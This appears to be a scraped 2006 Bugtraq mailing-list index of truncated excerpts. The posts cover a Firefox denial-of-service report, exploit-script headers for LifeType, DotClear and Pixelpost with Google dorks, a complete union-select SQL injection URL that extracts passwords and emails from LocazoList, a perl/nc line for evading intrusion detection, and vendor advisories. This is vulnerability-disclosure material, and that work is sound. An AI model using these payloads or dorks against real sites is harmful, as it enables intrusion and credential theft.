I see this work in explorer and my ie 7 beta, both of them crashes. But
this does not seem to be easily exploitable. It is a simple stack buffer
overun issue. The problem seems to be in
inetcomm!CActiveUrlRequest::ParseUrl..... now inetcomm seemed to have been
gs flagged complied,hence the ovew

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I was able to use this proof of concept code with the following results:

With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13)
Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8)
I was able to cause a resource exhaustion with firefox in

[ more ]  [ reply ]

Yep.

I can confirm this for firefox 1.5.0.3 on ubuntu dapper amd64.

Filling a bug report

[ more ]  [ reply ]

Under Apple Mac OS X 10.4.6 (PPC) with Firefox 1.5.0.3 it's
reproducible!

Cheers, Yannick von Arx

Am 31.05.2006 um 16:50 schrieb Josh Zlatin-Amishav:

> On Tue, 30 May 2006, co296 (at) aol (dot) com [email concealed] wrote:
>
>> I have found a problem which causes denial of service on fire fox
>> browser
>
> Can you give

[ more ]  [ reply ]

I told this guy all ready that it looks like WinXP is the problem.
Mac OS X and Debian (Linux) does not hang!

With regards,

Ronald van den Blink
Securityview.org
On 31 May, 2006, at 16:50, Josh Zlatin-Amishav wrote:

> On Tue, 30 May 2006, co296 (at) aol (dot) com [email concealed] wrote:
>
>> I have found a problem which

[ more ]  [ reply ]

Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2

Andy

-----Original Message-----
From: Josh Zlatin-Amishav [mailto:josh (at) tkos.co (dot) il [email concealed]]
Sent: 31 May 2006 16:50
To: co296 (at) aol (dot) com [email concealed]
Cc: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Re: Fire fox dos exploit

On Tue, 30 May 2006, co296@aol

[ more ]  [ reply ]

Successfully tested on Firefox 1.5.0.3.

I had to kill my firefox.exe process after half a minute of freezing :-)

On 30 May 2006 12:03:36 -0000, co296 (at) aol (dot) com [email concealed] <co296 (at) aol (dot) com [email concealed]> wrote:
> I have found a problem which causes denial of service on fire fox browser
>
>
> Creadit:to n00b for finding this bu

[ more ]  [ reply ]

As a systems administrator, I must say that your methods are
unacceptable. You are violating your customers' trust by doing this
without their knowledge. You even made an effort to hide the code that
sends the information! This is outright deceit and should not be
tolerated by anyone.

Regardles

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "LifeType <= 1.0.4_r3270 SQL injection / admin credentials disclosure\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHT

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "DotClear <= 1.2.4 prepend.php/'blog_dc_path' arbitrary remote inclusion\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\" +commentaires\

[ more ]  [ reply ]

[Sorry to reply to my own post, but...]

M. Dodge Mumford said:
> Sigint Consulting said:
> > perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
> > 192.168.1.3 80
> >
> > No alert is generated from the string above.
>
> [...]
>
> > We are not sure how much this may buy an attacker as

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1089-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 3rd, 2006

[ more ]  [ reply ]

[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

------------------------------------------------------------------------
-------------

Software: dotWidget CMS

Version: <=1.0.6

Type: Remote File Include Vulnerability

Date: June, 2nd 2006

Vendor: dotWidget

[ more ]  [ reply ]

********************************************************************

*Title:

*phpBB2 Remote File Include

*

*

*Credit:

*Canberx

*

*

*Thanx:

*Forewer-Partizan

*

*

*Mail:

*canberx (at) linuxmail (dot) org [email concealed] www.canberx.tk

*

*

*Google Dork:

*Powered by phpBB © 2001, 2002 phpBB Group

*

*

*Expl

[ more ]  [ reply ]

# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Author : ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0
,0,email,0,0,0,0,0

[ more ]  [ reply ]

This is not vulnerable,PHP-Nuke having a special in their files and when includes mainfile.php it overwrites the global variables and it caused to make an arbitrary file inclusion.

But in MyBloggie there is no common vulnerability like it.I checked all files and all versions did not see any vulnera

[ more ]  [ reply ]

the Blackhat agenda for USA 2006 session had just been published : URL
<http://www.blackhat.com/html/bh-usa-06/bh-usa-06-schedule.html>

The first remark is that this year, Blackhat USA, will be an incredible
briefing !

There will be several Zero day announcements. For example: Brendan
O'Connor

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1088-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 3rd, 2006

[ more ]  [ reply ]

Type: SQL Injection

Risk: Critical

Product: CoolForum <= 0.8.3 beta

********************************

Vulnerability

*************

// File: editpost.php

// Line 38

//

if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);

else $post = 0;

--

// Line 77

//

$canedit = getrighte

[ more ]  [ reply ]

____________________ ___ ___ ________

\_ _____/\_ ___ \ / | \\_____ \

| __)_ / \ \// ~ \/ | \

| \\ \___\ Y / | /_______ / \______ /\___|_ /\_______ /

\/ \/ \/ \/

.OR.ID

ECHO_ADV_32$2006

----

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1087-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 3rd, 2006

[ more ]  [ reply ]

http://evuln.com/vulns/3/exploit.html look :]

--
_______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze

[ more ]  [ reply ]

Sorry but i didnt see any SQL injection with your example.

I tried all ways and did not get any result or error from SQL server.

Could you please show me injection that you found.

and vulnerable codes in misc.php

Regards,

Mustafa Can Bjorn IPEKCI

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Pixelpost <= 1-5rc1-2 privilege escalation exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n";

/*

works wit

[ more ]  [ reply ]

Sigint Consulting said:
> However we can once again bypass this by including our CR character
> before our string like so:
>
> perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
> 192.168.1.3 80
>
> No alert is generated from the string above.

[...]

> We are not sure how much this ma

[ more ]  [ reply ]

>include("../../../mainfile.php");
>
>include($phpbb_root_path.'common.'.$phpEx);
>
>...
>
>in mainfile.php at lines 54-56
>
>...
>
>import_request_variables('GPC');

Oh, OK - now that makes sense. This looks like one aspect of the
"globals overwrite" problem as originally documented by Stefan E

[ more ]  [ reply ]

rPath Security Advisory: 2006-0091-1
Published: 2006-06-02
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Local User Deterministic Vulnerability
Updated Versions:
firefox=/conary.rpath.com@rpl:devel//1/1.5.0.4-1-0.1
thunderbird=/conary.rpath.com@rpl:devel//1/1.5.0.4

[ more ]  [ reply ]

------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-006
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-006
Project: Drupal core
Date:

[ more ]  [ reply ]

------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-008
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-008
Project: Drupal core
Date:

[ more ]  [ reply ]

------------------------------------------------------------------------
----
Drupal security advisory DRUPAL-SA-2006-007
------------------------------------------------------------------------
----
Advisory ID: DRUPAL-SA-2006-007
Project: Drupal core and an

[ more ]  [ reply ]